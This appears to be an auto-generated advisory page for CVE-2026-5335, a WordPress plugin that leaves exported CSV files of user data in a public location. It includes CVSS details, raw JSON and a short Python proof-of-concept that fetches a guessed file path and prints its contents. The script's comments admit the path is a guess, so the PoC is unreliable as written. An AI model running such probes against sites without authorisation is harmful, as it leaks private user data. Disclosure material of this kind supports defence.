Security Vulnerability Report
中文
CVE-2026-5335 CVSS 5.3 MEDIUM

CVE-2026-5335

Published: 2026-05-04 07:16:01
Last Modified: 2026-05-04 15:23:20

Description

The Magic Export & Import WordPress plugin before 1.2.0 stores exported CSV files at a publicly accessible location, making it possible for any visitors to leak sensitive user information.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Magic Export & Import < 1.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_cve_2026_5335(base_url): # Predictable path for exported CSV files in vulnerable versions # The exact path might vary, but usually resides in uploads # Example path based on common plugin behavior target_url = f"{base_url}/wp-content/uploads/magic-export-export.csv" # Note: Actual path may require directory enumeration or specific timestamp guessing try: response = requests.get(target_url, timeout=5) if response.status_code == 200: print(f"[+] Vulnerable! Sensitive data leaked at: {target_url}") print(f"[+] Content preview: {response.text[:100]}") else: print(f"[-] Not detected or fixed. Status code: {response.status_code}") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target_site = "http://example.com" check_cve_2026_5335(target_site)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5335", "sourceIdentifier": "[email protected]", "published": "2026-05-04T07:16:01.343", "lastModified": "2026-05-04T15:23:19.800", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Magic Export & Import WordPress plugin before 1.2.0 stores exported CSV files at a publicly accessible location, making it possible for any visitors to leak sensitive user information."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://wpscan.com/vulnerability/ed6f00de-bbae-4e89-9d0e-ded0d70e781c/", "source": "[email protected]"}]}}